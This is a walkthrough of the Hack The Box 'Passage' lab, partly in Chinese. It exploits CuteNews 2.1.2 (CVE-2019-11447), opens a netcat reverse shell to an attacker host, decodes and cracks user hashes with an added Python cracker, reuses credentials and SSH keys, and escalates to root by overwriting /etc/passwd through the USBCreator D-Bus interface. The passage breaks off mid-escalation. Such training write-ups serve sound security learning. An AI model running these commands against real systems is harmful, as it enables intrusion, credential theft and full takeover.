Passage-htb-writeup

0x00 Skills covered by this box

Skills in this chapter: web page and directory analysis, CVE-2019-11447, enumerating a web application's flat-file user database, bash scripting, cracking SHA-256 password hashes (SHA-256 is a hash, not encryption, so the password can only be recovered by guessing), credential reuse, SSH key reuse, and a sudo password-policy bypass through the USBCreator D-Bus interface

Reference: https://0xdf.gitlab.io/2021/03/06/htb-passage.html

0x01 Getting user

1. Target IP address: 10.10.10.206

2. Scan for open ports

┌──(kali㉿kali)-[~/桌面/tools/portscan]
└─$ sudo ./htb-portscan.sh 10.10.10.206 tcp
[sudo] kali 的密码:
开始对 10.10.10.206 进行nmap端口扫描...
* 正在执行tcp协议的端口扫描探测...
sudo nmap -min-rate 10000 -p- "10.10.10.206" -oG "10.10.10.206"-tcp-braker-allports

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-12 16:10 CST
Nmap scan report for 10.10.10.206
Host is up (0.31s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http

Nmap done: 1 IP address (1 host up) scanned in 11.04 seconds
* 正在对开放的端口进行TCP全连接式版本探测和系统版本以及漏洞探测...
sudo nmap -sT -sV -sC -p"22,80," "10.10.10.206"

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-12 16:10 CST
Nmap scan report for 10.10.10.206
Host is up (0.37s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 17:eb:9e:23:ea:23:b6:b1:bc:c6:4f:db:98:d3:d4:a1 (RSA)
| 256 71:64:51:50:c3:7f:18:47:03:98:3e:5e:b8:10:19:fc (ECDSA)
|_ 256 fd:56:2a:f8:d0:60:a7:f1:a0:a1:47:a4:38:d6:a8:a1 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Passage News
|_http-server-header: Apache/2.4.18 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 25.32 seconds

3. Only two ports are open, so start with port 80

http://10.10.10.206/

4. The first article on the home page gives a hint

Due to unusually high traffic, we have implemented Fail2Ban on our website. Please note that excessive access to our server will result in your IP address being banned. While we do not wish to lock out legitimate users, this decision was necessary to ensure a secure viewing experience. Please exercise caution as you browse our extensive selection of news. View and comment

5. The site footer shows it runs CuteNews and links to the source repository; the GitHub project is old and no longer updated or maintained

Powered by CuteNews

https://github.com/CuteNews/cutenews-2.0

6. Searching the page source turned up the path http://10.10.10.206/CuteNews/rss.php; visiting http://10.10.10.206/CuteNews/ shows a login page together with version information

7. Register an account and log in to look around

http://10.10.10.206/CuteNews/?register

test:test

http://10.10.10.206/CuteNews/index.php

8. The CMS version is visible here

CuteNews v2.1.2

9. Search for known vulnerabilities in this version

┌──(kali㉿kali)-[~/桌面]
└─$ searchsploit CuteNews 2.1.2
-------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
-------------------------------------------------------------------------------------------------------------------------- ---------------------------------
CuteNews 2.1.2 - 'avatar' Remote Code Execution (Metasploit) | php/remote/46698.rb
CuteNews 2.1.2 - Arbitrary File Deletion | php/webapps/48447.txt
CuteNews 2.1.2 - Authenticated Arbitrary File Upload | php/webapps/48458.txt
CuteNews 2.1.2 - Remote Code Execution | php/webapps/48800.py
-------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

┌──(kali㉿kali)-[~/桌面]
└─$ searchsploit -m php/webapps/48800.py
Exploit: CuteNews 2.1.2 - Remote Code Execution
URL: https://www.exploit-db.com/exploits/48800
Path: /usr/share/exploitdb/exploits/php/webapps/48800.py
Codes: CVE-2019-11447
Verified: True
File Type: Python script, ASCII text executable
Copied to: /home/kali/桌面/48800.py

10. Pulled the remote code execution exploit; one notable point is that it targets the same version as the one mentioned in a comment on GitHub

11. Add a hosts entry first; this hostname appears on both the front end and the admin panel

┌──(kali㉿kali)-[~/桌面]
└─$ echo "10.10.10.206 passage.htb" | sudo tee -a /etc/hosts
[sudo] kali 的密码:
10.10.10.206 passage.htb

12. Try the exploit

┌──(kali㉿kali)-[~/桌面]
└─$ python3 48800.py

_____ __ _ __ ___ ___ ___
/ ___/_ __/ /____ / |/ /__ _ _____ |_ | < / |_ |
/ /__/ // / __/ -_) / -_) |/|/ (_-< / __/_ / / / __/
\___/\_,_/\__/\__/_/|_/\__/|__,__/___/ /____(_)_(_)____/
___ _________
/ _ \/ ___/ __/
/ , _/ /__/ _/
/_/|_|\___/___/


[->] Usage python3 expoit.py

Enter the URL> http://10.10.10.206
================================================================
Users SHA-256 HASHES TRY CRACKING THEM WITH HASHCAT OR JOHN
================================================================
7144a8b531c27a60b51d81ae16be3a81cef722e11b43a26fde0ca97f9e1485e1
4bdd0a0bb47fc9f66cbf1a8982fd2d344d2aec283d1afaebb4653ec3954dff88
e26f3e86d1f8108120723ebe690e5d3d61628f4130076ec6cb43f16f497273cd
f669a6f691f98ab0562356c0cd5d5e7dcdc20a07941c86adcfce9af3085fbeca
4db1f0bfd63be058d4ab04f18f65331ac11bb494b5792c480faf7fb0c40fa9cc
================================================================

=============================
Registering a users
=============================
[+] Registration successful with username: fN34nPPzK0 and password: fN34nPPzK0

=======================================================
Sending Payload
=======================================================
signature_key: d3895d20c2d2191e0f5ad06472a27e97-fN34nPPzK0
signature_dsi: 1b72189238f74644dade998b6be6f053
logged in user: fN34nPPzK0
============================
Dropping to a SHELL
============================

command > id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

command >

13. The exploit works, so use it to spawn a reverse shell

command > rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.10.14.8 443 >/tmp/f   

14. The initial shell comes back as www-data

┌──(kali㉿kali)-[~/桌面]
└─$ nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.14.8] from (UNKNOWN) [10.10.10.206] 49008
sh: 0: can't access tty; job control turned off
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@passage:/var/www/html/CuteNews/uploads$

www-data@passage:/var/www/html/CuteNews/uploads$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@passage:/var/www/html/CuteNews/uploads$

15. /home contains two users, and neither home directory is readable by www-data

www-data@passage:/var/www/html/CuteNews/uploads$ ls -la /home
ls -la /home
total 16
drwxr-xr-x 4 root root 4096 Jul 21 2020 .
drwxr-xr-x 23 root root 4096 Jul 21 2020 ..
drwxr-x--- 17 nadav nadav 4096 Jan 12 00:07 nadav
drwxr-x--- 16 paul paul 4096 Sep 2 2020 paul
www-data@passage:/var/www/html/CuteNews/uploads$

16. After digging through the web root for a while, the CuteNews flat-file user database turned up under cdata/users

www-data@passage:/var/www/html/CuteNews/cdata$ cd users
cd users
www-data@passage:/var/www/html/CuteNews/cdata/users$ ls
ls
09.php 21.php 5d.php 6e.php 7a.php b0.php d4.php f6.php lines
0a.php 32.php 66.php 71.php 8f.php bf.php d5.php f9.php users.txt
16.php 52.php 6d.php 77.php 97.php c8.php d6.php fc.php
www-data@passage:/var/www/html/CuteNews/cdata/users$
www-data@passage:/var/www/html/CuteNews/cdata/users$ cat 09.php
cat 09.php
<?php die('Direct call - access denied'); ?>
YToyOntzOjU6ImVtYWlsIjthOjE6e3M6MTY6InBhdWxAcGFzc2FnZS5odGIiO3M6MTA6InBhdWwtY29sZXMiO31zOjQ6Im5hbWUiO2E6MTp7czo0OiJ0ZXN0IjthOjY6e3M6MjoiaWQiO3M6MTA6IjE3MDUwNDc5NzEiO3M6NDoibmFtZSI7czo0OiJ0ZXN0IjtzOjM6ImFjbCI7czoxOiI0IjtzOjU6ImVtYWlsIjtzOjExOiJ0ZXN0QHFxLmNvbSI7czo0OiJuaWNrIjtzOjQ6InRlc3QiO3M6NDoicGFzcyI7czo2NDoiOWY4NmQwODE4ODRjN2Q2NTlhMmZlYWEwYzU1YWQwMTVhM2JmNGYxYjJiMGI4MjJjZDE1ZDZjMTViMGYwMGEwOCI7fX19www-data@passage:/var/www/html/CuteNews/cdata/users$

17. Base64-decoding the blob gives a serialized PHP array with account data; this particular record is the account I registered, and the pass field is the plain SHA-256 of its password

a:2:{s:5:"email";a:1:{s:16:"paul@passage.htb";s:10:"paul-coles";}s:4:"name";a:1:{s:4:"test";a:6:{s:2:"id";s:10:"1705047971";s:4:"name";s:4:"test";s:3:"acl";s:1:"4";s:5:"email";s:11:"test@qq.com";s:4:"nick";s:4:"test";s:4:"pass";s:64:"9f86d081884c7d659a2feaa0c55ad015a3bf4f1b2b0b822cd15d6c15b0f00a08";}}}

18. The lines file holds a whole list of base64-encoded records, one per line

www-data@passage:/var/www/html/CuteNews/cdata/users$ cat lines
cat lines
<?php die('Direct call - access denied'); ?>
YToxOntzOjU6ImVtYWlsIjthOjE6e3M6MTY6InBhdWxAcGFzc2FnZS5odGIiO3M6MTA6InBhdWwtY29sZXMiO319
<?php die('Direct call - access denied'); ?>
YToxOntzOjI6ImlkIjthOjE6e2k6MTU5ODgyOTgzMztzOjY6ImVncmU1NSI7fX0=
<?php die('Direct call - access denied'); ?>
YToxOntzOjU6ImVtYWlsIjthOjE6e3M6MTU6ImVncmU1NUB0ZXN0LmNvbSI7czo2OiJlZ3JlNTUiO319
<?php die('Direct call - access denied'); ?>
YToxOntzOjQ6Im5hbWUiO2E6MTp7czo1OiJhZG1pbiI7YTo4OntzOjI6ImlkIjtzOjEwOiIxNTkyNDgzMDQ3IjtzOjQ6Im5hbWUiO3M6NToiYWRtaW4iO3M6MzoiYWNsIjtzOjE6IjEiO3M6NToiZW1haWwiO3M6MTc6Im5hZGF2QHBhc3NhZ2UuaHRiIjtzOjQ6InBhc3MiO3M6NjQ6IjcxNDRhOGI1MzFjMjdhNjBiNTFkODFhZTE2YmUzYTgxY2VmNzIyZTExYjQzYTI2ZmRlMGNhOTdmOWUxNDg1ZTEiO3M6MzoibHRzIjtzOjEwOiIxNTkyNDg3OTg4IjtzOjM6ImJhbiI7czoxOiIwIjtzOjM6ImNudCI7czoxOiIyIjt9fX0=
<?php die('Direct call - access denied'); ?>
YToxOntzOjI6ImlkIjthOjE6e2k6MTU5MjQ4MzI4MTtzOjk6InNpZC1tZWllciI7fX0=
<?php die('Direct call - access denied'); ?>
YToxOntzOjU6ImVtYWlsIjthOjE6e3M6MTc6Im5hZGF2QHBhc3NhZ2UuaHRiIjtzOjU6ImFkbWluIjt9fQ==
<?php die('Direct call - access denied'); ?>
YToxOntzOjU6ImVtYWlsIjthOjE6e3M6MTU6ImtpbUBleGFtcGxlLmNvbSI7czo5OiJraW0tc3dpZnQiO319
<?php die('Direct call - access denied'); ?>
YToxOntzOjI6ImlkIjthOjE6e2k6MTU5MjQ4MzIzNjtzOjEwOiJwYXVsLWNvbGVzIjt9fQ==
<?php die('Direct call - access denied'); ?>
YToxOntzOjQ6Im5hbWUiO2E6MTp7czo5OiJzaWQtbWVpZXIiO2E6OTp7czoyOiJpZCI7czoxMDoiMTU5MjQ4MzI4MSI7czo0OiJuYW1lIjtzOjk6InNpZC1tZWllciI7czozOiJhY2wiO3M6MToiMyI7czo1OiJlbWFpbCI7czoxNToic2lkQGV4YW1wbGUuY29tIjtzOjQ6Im5pY2siO3M6OToiU2lkIE1laWVyIjtzOjQ6InBhc3MiO3M6NjQ6IjRiZGQwYTBiYjQ3ZmM5ZjY2Y2JmMWE4OTgyZmQyZDM0NGQyYWVjMjgzZDFhZmFlYmI0NjUzZWMzOTU0ZGZmODgiO3M6MzoibHRzIjtzOjEwOiIxNTkyNDg1NjQ1IjtzOjM6ImJhbiI7czoxOiIwIjtzOjM6ImNudCI7czoxOiIyIjt9fX0=
<?php die('Direct call - access denied'); ?>
YToxOntzOjI6ImlkIjthOjE6e2k6MTU5MjQ4MzA0NztzOjU6ImFkbWluIjt9fQ==
<?php die('Direct call - access denied'); ?>
YToxOntzOjU6ImVtYWlsIjthOjE6e3M6MTU6InNpZEBleGFtcGxlLmNvbSI7czo5OiJzaWQtbWVpZXIiO319
<?php die('Direct call - access denied'); ?>
YToxOntzOjQ6Im5hbWUiO2E6MTp7czoxMDoicGF1bC1jb2xlcyI7YTo5OntzOjI6ImlkIjtzOjEwOiIxNTkyNDgzMjM2IjtzOjQ6Im5hbWUiO3M6MTA6InBhdWwtY29sZXMiO3M6MzoiYWNsIjtzOjE6IjIiO3M6NToiZW1haWwiO3M6MTY6InBhdWxAcGFzc2FnZS5odGIiO3M6NDoibmljayI7czoxMDoiUGF1bCBDb2xlcyI7czo0OiJwYXNzIjtzOjY0OiJlMjZmM2U4NmQxZjgxMDgxMjA3MjNlYmU2OTBlNWQzZDYxNjI4ZjQxMzAwNzZlYzZjYjQzZjE2ZjQ5NzI3M2NkIjtzOjM6Imx0cyI7czoxMDoiMTU5MjQ4NTU1NiI7czozOiJiYW4iO3M6MToiMCI7czozOiJjbnQiO3M6MToiMiI7fX19
<?php die('Direct call - access denied'); ?>
YToxOntzOjQ6Im5hbWUiO2E6MTp7czo5OiJraW0tc3dpZnQiO2E6OTp7czoyOiJpZCI7czoxMDoiMTU5MjQ4MzMwOSI7czo0OiJuYW1lIjtzOjk6ImtpbS1zd2lmdCI7czozOiJhY2wiO3M6MToiMyI7czo1OiJlbWFpbCI7czoxNToia2ltQGV4YW1wbGUuY29tIjtzOjQ6Im5pY2siO3M6OToiS2ltIFN3aWZ0IjtzOjQ6InBhc3MiO3M6NjQ6ImY2NjlhNmY2OTFmOThhYjA1NjIzNTZjMGNkNWQ1ZTdkY2RjMjBhMDc5NDFjODZhZGNmY2U5YWYzMDg1ZmJlY2EiO3M6MzoibHRzIjtzOjEwOiIxNTkyNDg3MDk2IjtzOjM6ImJhbiI7czoxOiIwIjtzOjM6ImNudCI7czoxOiIzIjt9fX0=
<?php die('Direct call - access denied'); ?>
<?php die('Direct call - access denied'); ?>
<?php die('Direct call - access denied'); ?>
YToxOntzOjQ6Im5hbWUiO2E6MTp7czo2OiJlZ3JlNTUiO2E6MTE6e3M6MjoiaWQiO3M6MTA6IjE1OTg4Mjk4MzMiO3M6NDoibmFtZSI7czo2OiJlZ3JlNTUiO3M6MzoiYWNsIjtzOjE6IjQiO3M6NToiZW1haWwiO3M6MTU6ImVncmU1NUB0ZXN0LmNvbSI7czo0OiJuaWNrIjtzOjY6ImVncmU1NSI7czo0OiJwYXNzIjtzOjY0OiI0ZGIxZjBiZmQ2M2JlMDU4ZDRhYjA0ZjE4ZjY1MzMxYWMxMWJiNDk0YjU3OTJjNDgwZmFmN2ZiMGM0MGZhOWNjIjtzOjQ6Im1vcmUiO3M6NjA6IllUb3lPbnR6T2pRNkluTnBkR1VpTzNNNk1Eb2lJanR6T2pVNkltRmliM1YwSWp0ek9qQTZJaUk3ZlE9PSI7czozOiJsdHMiO3M6MTA6IjE1OTg4MzQwNzkiO3M6MzoiYmFuIjtzOjE6IjAiO3M6NjoiYXZhdGFyIjtzOjI2OiJhdmF0YXJfZWdyZTU1X3Nwd3ZndWp3LnBocCI7czo2OiJlLWhpZGUiO3M6MDoiIjt9fX0=
<?php die('Direct call - access denied'); ?>
YToxOntzOjI6ImlkIjthOjE6e2k6MTU5MjQ4MzMwOTtzOjk6ImtpbS1zd2lmdCI7fX0=
www-data@passage:/var/www/html/CuteNews/cdata/users$

19. Next, extract the email/hash pairs from this directory. Since my bash scripting is weak and I didn't want to write it from scratch, I used the one-liner from the reference writeup directly

www-data@passage:/var/www/html/CuteNews/cdata/users$ cat lines | grep -v "php die" | while read line; do decode=$(echo $line | base64 -d); email=$(echo $decode | grep -Po '\w+@\w+\.\w+'); hash=$(echo $decode | grep -Po '\w{64}'); if [ -n "$hash" ]; then echo "$email:$hash"; fi; done
nadav@passage.htb:7144a8b531c27a60b51d81ae16be3a81cef722e11b43a26fde0ca97f9e1485e1
sid@example.com:4bdd0a0bb47fc9f66cbf1a8982fd2d344d2aec283d1afaebb4653ec3954dff88
paul@passage.htb:e26f3e86d1f8108120723ebe690e5d3d61628f4130076ec6cb43f16f497273cd
kim@example.com:f669a6f691f98ab0562356c0cd5d5e7dcdc20a07941c86adcfce9af3085fbeca
egre55@test.com:4db1f0bfd63be058d4ab04f18f65331ac11bb494b5792c480faf7fb0c40fa9cc
www-data@passage:/var/www/html/CuteNews/cdata/users$

20. The hash of the target user is among them

paul@passage.htb:e26f3e86d1f8108120723ebe690e5d3d61628f4130076ec6cb43f16f497273cd

21. Since it is an unsalted SHA-256, a lookup on https://crackstation.net/ recovers the password straight away

Hash                                                                Type    Result
e26f3e86d1f8108120723ebe690e5d3d61628f4130076ec6cb43f16f497273cd    sha256  atlanta1
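The one-liner in step 19 relies on two regexes and only works because the email and the hash happen to sit in the same record. The Python below is an added example, not code from the original writeup or from CuteNews: it actually parses the serialized PHP hidden inside the base64, so the username, ACL level and email come out next to the hash, and it then cracks the unsalted SHA-256 values with one hash table over a wordlist. The sample records are the ones printed above (09.php and lines, guard lines included); WORDLIST is made up for the demo, and the function names are mine.

```python
import base64
import hashlib

# Records copied from the writeup's output: the first is cdata/users/09.php
# (the "test" account registered earlier), the rest come from cdata/users/lines.
# The '<?php die' guard lines are kept to show they must be skipped.
SAMPLE_RECORDS = """\
<?php die('Direct call - access denied'); ?>
YToyOntzOjU6ImVtYWlsIjthOjE6e3M6MTY6InBhdWxAcGFzc2FnZS5odGIiO3M6MTA6InBhdWwtY29sZXMiO31zOjQ6Im5hbWUiO2E6MTp7czo0OiJ0ZXN0IjthOjY6e3M6MjoiaWQiO3M6MTA6IjE3MDUwNDc5NzEiO3M6NDoibmFtZSI7czo0OiJ0ZXN0IjtzOjM6ImFjbCI7czoxOiI0IjtzOjU6ImVtYWlsIjtzOjExOiJ0ZXN0QHFxLmNvbSI7czo0OiJuaWNrIjtzOjQ6InRlc3QiO3M6NDoicGFzcyI7czo2NDoiOWY4NmQwODE4ODRjN2Q2NTlhMmZlYWEwYzU1YWQwMTVhM2JmNGYxYjJiMGI4MjJjZDE1ZDZjMTViMGYwMGEwOCI7fX19
<?php die('Direct call - access denied'); ?>
YToxOntzOjU6ImVtYWlsIjthOjE6e3M6MTY6InBhdWxAcGFzc2FnZS5odGIiO3M6MTA6InBhdWwtY29sZXMiO319
<?php die('Direct call - access denied'); ?>
YToxOntzOjQ6Im5hbWUiO2E6MTp7czo1OiJhZG1pbiI7YTo4OntzOjI6ImlkIjtzOjEwOiIxNTkyNDgzMDQ3IjtzOjQ6Im5hbWUiO3M6NToiYWRtaW4iO3M6MzoiYWNsIjtzOjE6IjEiO3M6NToiZW1haWwiO3M6MTc6Im5hZGF2QHBhc3NhZ2UuaHRiIjtzOjQ6InBhc3MiO3M6NjQ6IjcxNDRhOGI1MzFjMjdhNjBiNTFkODFhZTE2YmUzYTgxY2VmNzIyZTExYjQzYTI2ZmRlMGNhOTdmOWUxNDg1ZTEiO3M6MzoibHRzIjtzOjEwOiIxNTkyNDg3OTg4IjtzOjM6ImJhbiI7czoxOiIwIjtzOjM6ImNudCI7czoxOiIyIjt9fX0=
<?php die('Direct call - access denied'); ?>
YToxOntzOjQ6Im5hbWUiO2E6MTp7czoxMDoicGF1bC1jb2xlcyI7YTo5OntzOjI6ImlkIjtzOjEwOiIxNTkyNDgzMjM2IjtzOjQ6Im5hbWUiO3M6MTA6InBhdWwtY29sZXMiO3M6MzoiYWNsIjtzOjE6IjIiO3M6NToiZW1haWwiO3M6MTY6InBhdWxAcGFzc2FnZS5odGIiO3M6NDoibmljayI7czoxMDoiUGF1bCBDb2xlcyI7czo0OiJwYXNzIjtzOjY0OiJlMjZmM2U4NmQxZjgxMDgxMjA3MjNlYmU2OTBlNWQzZDYxNjI4ZjQxMzAwNzZlYzZjYjQzZjE2ZjQ5NzI3M2NkIjtzOjM6Imx0cyI7czoxMDoiMTU5MjQ4NTU1NiI7czozOiJiYW4iO3M6MToiMCI7czozOiJjbnQiO3M6MToiMiI7fX19
"""

# Constructed wordlist for the demo; on an engagement feed the hashes to
# hashcat -m 1400 or john --format=raw-sha256 with a real list instead.
WORDLIST = ["password", "123456", "passage", "atlanta1", "test"]


def php_unserialize(data, pos=0):
    """Minimal PHP unserialize() for the a:/s:/i:/b: types CuteNews uses.
    Returns (value, position after the value). Strings are length prefixed,
    so quotes or ';' inside a value cannot confuse the parser."""
    kind = data[pos]
    if kind == "s":                                   # s:<len>:"<text>";
        colon = data.index(":", pos + 2)
        length = int(data[pos + 2:colon])
        start = colon + 2                             # skip :"
        return data[start:start + length], start + length + 2   # skip ";
    if kind == "i":                                   # i:<int>;
        end = data.index(";", pos)
        return int(data[pos + 2:end]), end + 1
    if kind == "b":                                   # b:0; or b:1;
        end = data.index(";", pos)
        return data[pos + 2:end] == "1", end + 1
    if kind == "a":                                   # a:<count>:{key;value;...}
        colon = data.index(":", pos + 2)
        count = int(data[pos + 2:colon])
        p = colon + 2                                 # skip :{
        result = {}
        for _ in range(count):
            key, p = php_unserialize(data, p)
            value, p = php_unserialize(data, p)
            result[key] = value
        return result, p + 1                          # skip }
    raise ValueError(f"unsupported type {kind!r} at offset {pos}")


def extract_users(records):
    """Decode each base64 line and pull user records out of the 'name' index.
    Lines that only hold the email/id lookup indexes carry no hash and are skipped."""
    users = []
    for line in records.splitlines():
        line = line.strip()
        if not line or line.startswith("<?php"):
            continue
        raw = base64.b64decode(line + "=" * (-len(line) % 4))
        # latin-1 keeps one char per byte, so PHP's byte lengths stay correct
        record, _ = php_unserialize(raw.decode("latin-1"))
        for username, fields in record.get("name", {}).items():
            users.append({
                "user": username,
                "email": fields.get("email"),
                "acl": fields.get("acl"),             # "1" is the admin level
                "hash": fields.get("pass"),
            })
    return users


def sha256_hex(word):
    return hashlib.sha256(word.encode()).hexdigest()


def crack(users, wordlist):
    """CuteNews 2.1.2 stores plain, unsalted SHA-256, so a single table built
    from the wordlist cracks every user at once instead of hashing per user."""
    table = {sha256_hex(w): w for w in wordlist}
    return {u["user"]: table[u["hash"]] for u in users if u["hash"] in table}


if __name__ == "__main__":
    found = extract_users(SAMPLE_RECORDS)
    for u in found:
        print(f'{u["user"]:<12} acl={u["acl"]} {u["email"]}:{u["hash"]}')
    print("cracked:", crack(found, WORDLIST))
```

The unsalted scheme is the whole reason a lookup site works here: two users with the same password share the same hash, and one precomputed table covers the entire user base.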

22. Switch to that user with su

www-data@passage:/var/www/html/CuteNews/cdata/users$ su paul
su paul
Password: atlanta1

paul@passage:/var/www/html/CuteNews/cdata/users$ cd ~
cd ~
paul@passage:~$ ls
ls
Desktop Downloads Music Public user.txt
Documents examples.desktop Pictures Templates Videos
paul@passage:~$ id
id
uid=1001(paul) gid=1001(paul) groups=1001(paul)
paul@passage:~$

23. Grab the first flag

paul@passage:~$ cat user.txt
cat user.txt
d85694c762ac2c6b059cc178cef21434

0x02 Getting root

24. Initial enumeration shows paul has no sudo rights. To make further enumeration easier, pull paul's SSH private key and log in over SSH for a proper session

paul@passage:~$ ls -la /home/nadav
ls -la /home/nadav
ls: cannot open directory '/home/nadav': Permission denied
paul@passage:~$ cd .ssh
cd .ssh
paul@passage:~/.ssh$ ls
ls
authorized_keys id_rsa id_rsa.pub known_hosts
paul@passage:~/.ssh$ base64 id_rsa
base64 id_rsa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paul@passage:~/.ssh$


┌──(kali㉿kali)-[~/桌面]
└─$ echo LS0tLS1CRUdJTi...........SU0EgUFJJVkFURSBLRVktLS0tLQo= | base64 -d > id_rsa

┌──(kali㉿kali)-[~/桌面]
└─$ chmod 600 id_rsa

┌──(kali㉿kali)-[~/桌面]
└─$ ssh paul@10.10.10.206 -i id_rsa
The authenticity of host '10.10.10.206 (10.10.10.206)' can't be established.
ED25519 key fingerprint is SHA256:BD7E5sbGZ+avx6QQcDrb9FWVVlbulHrgseaqsAQrvC4.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.206' (ED25519) to the list of known hosts.
paul@passage:~$ id
uid=1001(paul) gid=1001(paul) groups=1001(paul)
paul@passage:~$

25. While reading the key I noticed something: the public key in paul's authorized_keys carries the comment nadav@passage, so the key pair appears to be shared with the other user

paul@passage:~$ cd .ssh
paul@passage:~/.ssh$ ls
authorized_keys id_rsa id_rsa.pub known_hosts
paul@passage:~/.ssh$ cat authorized_keys
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCzXiscFGV3l9T2gvXOkh9w+BpPnhFv5AOPagArgzWDk9uUq7/4v4kuzso/lAvQIg2gYaEHlDdpqd9gCYA7tg76N5RLbroGqA6Po91Q69PQadLsziJnYumbhClgPLGuBj06YKDktI3bo/H3jxYTXY3kfIUKo3WFnoVZiTmvKLDkAlO/+S2tYQa7wMleSR01pP4VExxPW4xDfbLnnp9zOUVBpdCMHl8lRdgogOQuEadRNRwCdIkmMEY5efV3YsYcwBwc6h/ZB4u8xPyH3yFlBNR7JADkn7ZFnrdvTh3OY+kLEr6FuiSyOEWhcPybkM5hxdL9ge9bWreSfNC1122qq49d nadav@passage
paul@passage:~/.ssh$

During enumeration the only key trusted by paul's account is labelled nadav@passage, which suggests both accounts use the same key pair; worth trying the same private key against nadav

26. Try logging in as the other user with the same private key

┌──(kali㉿kali)-[~/桌面]
└─$ ssh nadav@10.10.10.206 -i id_rsa
Last login: Mon Aug 31 15:07:54 2020 from 127.0.0.1
nadav@passage:~$ id
uid=1000(nadav) gid=1000(nadav) groups=1000(nadav),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare)
nadav@passage:~$

27. Likewise sudo -l can't be used for this account without nadav's password, even though the id output shows he is in the sudo group. Enumeration turned up a vulnerability I hadn't seen before and couldn't work out on my own = =!

28. Follow the reference writeup from here

USBCreator
A blog post from Palo Alto's Unit42 in July 2019 described a flaw they found in the USBCreator D-Bus interface:

It allows an attacker with access to a user in the sudoer group to bypass the password security policy imposed by the sudo program. The vulnerability lets the attacker overwrite arbitrary files with arbitrary content as root, without supplying a password. This trivially leads to privilege escalation, for instance by overwriting the shadow file and setting a password for root.

D-Bus is a message bus and a core component on many Linux systems; it lets processes running on the same host communicate. The bug lies in how this process's interface wrongly let an attacker trigger it to perform unintended, arbitrary writes as root.

29. Look at the .viminfo in nadav's home directory. It records that he edited /etc/dbus-1/system.d/com.ubuntu.USBCreator.conf and /etc/polkit-1/localauthority.conf.d/51-ubuntu-admin.conf, replacing AdminIdentities=unix-group:root with AdminIdentities=unix-group:sudo. That substitution is what lets a member of the sudo group such as nadav satisfy the polkit check on the USBCreator D-Bus method without a password

nadav@passage:~$ cat .viminfo
# This viminfo file was generated by Vim 7.4.
# You may edit it if you're careful!

# Value of 'encoding' when this file was written
*encoding=utf-8


# hlsearch on (H) or off (h):
~h
# Last Substitute Search Pattern:
~MSle0~&AdminIdentities=unix-group:root

# Last Substitute String:
$AdminIdentities=unix-group:sudo

# Command Line History (newest to oldest):
:wq
:%s/AdminIdentities=unix-group:root/AdminIdentities=unix-group:sudo/g

# Search String History (newest to oldest):
? AdminIdentities=unix-group:root

# Expression History (newest to oldest):

# Input Line History (newest to oldest):

# Input Line History (newest to oldest):

# Registers:

# File marks:
'0 12 7 /etc/dbus-1/system.d/com.ubuntu.USBCreator.conf
'1 2 0 /etc/polkit-1/localauthority.conf.d/51-ubuntu-admin.conf

# Jumplist (newest first):
-' 12 7 /etc/dbus-1/system.d/com.ubuntu.USBCreator.conf
-' 1 0 /etc/dbus-1/system.d/com.ubuntu.USBCreator.conf
-' 2 0 /etc/polkit-1/localauthority.conf.d/51-ubuntu-admin.conf
-' 1 0 /etc/polkit-1/localauthority.conf.d/51-ubuntu-admin.conf
-' 2 0 /etc/polkit-1/localauthority.conf.d/51-ubuntu-admin.conf
-' 1 0 /etc/polkit-1/localauthority.conf.d/51-ubuntu-admin.conf

# History of marks within files (newest to oldest):

> /etc/dbus-1/system.d/com.ubuntu.USBCreator.conf
" 12 7

> /etc/polkit-1/localauthority.conf.d/51-ubuntu-admin.conf
" 2 0
. 2 0
+ 2 0
nadav@passage:~$

30. Stage a copy of /etc/passwd with an extra UID 0 user and use the USBCreator Image method to copy it over the real file. openssl passwd -1 produces an MD5-crypt hash, which goes straight into the password field of the new entry; because that field is not "x", the system authenticates against it without consulting /etc/shadow. Two things to note in the transcript below: the first echo left out the username, so the first appended line has only six fields and is junk (the second echo is the correct one), and su -shiyan is parsed by su as the option -s hiyan with no username, so it targets root and asks for root's password, hence the authentication failures; the plain su shiyan in the next step works

nadav@passage:~$ cp /etc/passwd passwd
nadav@passage:~$ openssl passwd -1 shiyan
$1$z5ZN2u.x$d2Dxv6yt5qcCgkSvjalhG.
nadav@passage:~$ echo '$1$z5ZN2u.x$d2Dxv6yt5qcCgkSvjalhG.:0:0:pwned:/root:/bin/bash' >> passwd
nadav@passage:~$ tail -3 /etc/passwd
nadav:x:1000:1000:Nadav,,,:/home/nadav:/bin/bash
paul:x:1001:1001:Paul Coles,,,:/home/paul:/bin/bash
sshd:x:121:65534::/var/run/sshd:/usr/sbin/nologin
nadav@passage:~$ echo 'shiyan:$1$z5ZN2u.x$d2Dxv6yt5qcCgkSvjalhG.:0:0:pwned:/root:/bin/bash' >> passwd
nadav@passage:~$ tail -3 /etc/passwd
nadav:x:1000:1000:Nadav,,,:/home/nadav:/bin/bash
paul:x:1001:1001:Paul Coles,,,:/home/paul:/bin/bash
sshd:x:121:65534::/var/run/sshd:/usr/sbin/nologin
nadav@passage:~$ tail /etc/passwd
speech-dispatcher:x:114:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/false
hplip:x:115:7:HPLIP system user,,,:/var/run/hplip:/bin/false
